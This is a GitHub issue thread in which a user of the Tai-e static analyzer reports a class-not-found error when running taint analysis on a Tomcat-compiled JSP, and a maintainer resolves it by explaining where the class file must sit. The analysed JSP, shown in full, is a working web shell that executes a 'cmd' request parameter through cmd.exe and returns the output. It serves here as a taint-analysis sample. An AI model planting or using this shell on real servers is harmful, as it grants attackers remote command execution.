pascal-lab/Tai-e

RuntimeException: couldn't find class

Closed this issue · 2 comments

wangzitom12306 commented

Description

Tai-e is a great project, and the documentation is very thorough and explicit.
I am trying to use Tai-e for taint analysis on jsp files, but I encountered errors when running Tai-e.

I can't figure out the cause of the error.
Any help is greatly appreciated.

The error info is shown below:

Tai-e starts ...
Output directory: /home/abc/taie_tools/output
Writing options to /home/abc/taie_tools/output/options.yml
WARNING: sun.reflect.Reflection.getCallerClass is not supported. This will impact performance.
Writing log to /home/abc/taie_tools/output/tai-e.log
Writing analysis plan to /home/abc/taie_tools/output/tai-e-plan.yml
WorldBuilder starts ...
Exception in thread "main" java.lang.RuntimeException: couldn't find class: org.apache.jsp.shell_jsp (are your class path and class name given properly?)
        at pascal.taie.frontend.soot.SootWorldBuilder.runSoot(SootWorldBuilder.java:259)
        at pascal.taie.frontend.soot.SootWorldBuilder.build(SootWorldBuilder.java:84)
        at pascal.taie.Main.lambda$buildWorld$3(Main.java:132)
        at pascal.taie.util.Timer.lambda$runAndCount$0(Timer.java:112)
        at pascal.taie.util.Timer.runAndCount(Timer.java:93)
        at pascal.taie.util.Timer.runAndCount(Timer.java:111)
        at pascal.taie.util.Timer.runAndCount(Timer.java:107)
        at pascal.taie.Main.buildWorld(Main.java:124)
        at pascal.taie.Main.lambda$main$0(Main.java:59)
        at pascal.taie.util.Timer.lambda$runAndCount$0(Timer.java:112)
        at pascal.taie.util.Timer.runAndCount(Timer.java:93)
        at pascal.taie.util.Timer.runAndCount(Timer.java:111)
        at pascal.taie.util.Timer.runAndCount(Timer.java:107)
        at pascal.taie.Main.main(Main.java:51)

I'm using the following command to run Tai-e:

java -jar tai-e-all-0.2.2.jar 
--input-classes=org.apache.jsp.shell_jsp,javax.servlet.http.HttpServletResponseWrapper,javax.servlet.http.HttpServletRequestWrapper 
-a "pta=cs:2-type" 
-cp /path/to/javax.servlet-api/3.1.0/:/path/to/tomcat_jsp/ 
-pp=True

The jsp code is shown below:

<%@ page import="java.io.DataInputStream,java.io.InputStream,java.io.OutputStream" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        out.println("Command: " + cmd + "\n<BR>");                   
        Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>

I used tomcat to compile the above jsp file;
the generated java file and class file are attached below:
tomcat_jsp.zip

I'm using CentOS 7.8:

LSB Version:    :core-4.1-amd64:core-4.1-noarch
Distributor ID: CentOS
Description:    CentOS Linux release 7.8.2003 (Core)
Release:        7.8.2003
Codename:       Core

and java 17:

java version "17.0.10" 2024-01-16 LTS
Java(TM) SE Runtime Environment (build 17.0.10+11-LTS-240)
Java HotSpot(TM) 64-Bit Server VM (build 17.0.10+11-LTS-240, mixed mode, sharing)
zhangt2333 commented

The class name org.apache.jsp.shell_jsp will tell JVM compilation-related program (including javac and static analysis tool) to find the shell_jsp.[class|java] file under the path /path/to/classpath/org/apache/jsp.

So I guess, you need to move the shell_jsp.class file from /path/to/tomcat_jsp/shell_jsp.class to /path/to/tomcat_jsp/org/apache/jsp/shell_jsp.class.

  • 👍1
  • 🎉1
wangzitom12306 commented

Thank you very much for your thorough explanation.
I tried as you suggested, and it worked perfectly!
Thanks again!